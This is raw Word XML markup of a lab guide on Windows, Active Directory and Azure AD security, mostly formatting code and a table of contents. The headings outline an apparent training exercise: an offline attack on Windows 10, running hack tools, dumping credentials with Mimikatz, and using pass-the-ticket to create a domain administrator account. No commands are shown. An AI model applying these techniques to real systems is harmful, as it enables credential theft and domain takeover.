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Hlk533154169"/>
      <w:bookmarkStart w:id="1" w:name="_Toc492638964"/>
      <w:bookmarkStart w:id="2" w:name="_Toc492640496"/>
      <w:bookmarkStart w:id="3" w:name="_Toc492640573"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F36A4D">
        <w:t xml:space="preserve"> security, </w:t>
      </w:r>
      <w:r w:rsidR="00BA5AEC">
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidR="00F36A4D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>Azure AD</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="0FE582B4" w14:textId="2EB703E8" w:rsidR="00D759E3" w:rsidRPr="00800610" w:rsidRDefault="00122DB5" w:rsidP="00D151E4">
      <w:pPr>
        <w:pStyle w:val="NameofWorkshop"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC28B7">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Exercise</w:t>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6519C" w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Module </w:t>
      </w:r>
      <w:r w:rsidR="00F6519C" w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Section </w:t>
      </w:r>
      <w:r w:rsidR="00F6519C" w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00800610">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A6659" w14:textId="77777777" w:rsidR="00D759E3" w:rsidRPr="00800610" w:rsidRDefault="00D759E3" w:rsidP="007E3D91">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5A0715" w14:textId="2C64991D" w:rsidR="000D6FD3" w:rsidRPr="00800610" w:rsidRDefault="00350AEE" w:rsidP="000D6FD3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>June 2020</w:t>
      </w:r>
      <w:r w:rsidR="000D6FD3" w:rsidRPr="00800610">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>V1.</w:t>
      </w:r>
      <w:r w:rsidR="00137770">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37501D" w14:textId="77777777" w:rsidR="00E512F9" w:rsidRPr="00800610" w:rsidRDefault="00E512F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800610">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rP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3BC292A2" w:rsidR="00D67112" w:rsidRPr="00962C09" w:rsidRDefault="00D67112" w:rsidP="00D67112">
      <w:pPr>
        <w:spacing w:after="120" w:line="260" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="00962C09">
        <w:t xml:space="preserve">© </w:t>
      </w:r>
      <w:r w:rsidRPr="00386661">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00350AEE">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5516260B" w14:textId="7D45D98C" w:rsidR="00350AEE"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5671" w:history="1">
            <w:r w:rsidR="00350AEE" w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows security, Active Directory and Azure AD Lab step-by-step</w:t>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075671 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00350AEE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DBE5627" w14:textId="7A7F7FB1" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075672" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Abstract and learning objectives</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075672 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19FBEE10" w14:textId="3DF9DA34" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075673" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075673 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70E891C2" w14:textId="1D6F5482" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075674" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Requirements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075674 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="252CB74A" w14:textId="59372295" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075675" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Before the exercise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075675 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F805671" w14:textId="21E21928" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075676" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>List of VM to start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075676 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39810E9C" w14:textId="54C5AA76" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075677" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How to start and connect to a VM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075677 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="271A3D2E" w14:textId="5DE49ED4" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075678" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercise 1: Windows 10 offline attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34A9E4A1" w14:textId="7B76578A" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075679" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: Boot from media</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075679 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74B4C2EF" w14:textId="4FE6848E" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075680" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2: Configure local admin account</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075680 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55A751D8" w14:textId="27952F4E" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075681" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3: Run hack tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075681 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EFBB199" w14:textId="4EB27DDF" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075682" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 4: User Mimikatz to dump the credential manager</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075682 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68D90429" w14:textId="77B0317B" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075683" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 5: identify domain account logons</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075683 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="688180F8" w14:textId="38E7932D" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075684" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 6: use pass the ticket to create a domain administrator account</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075684 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
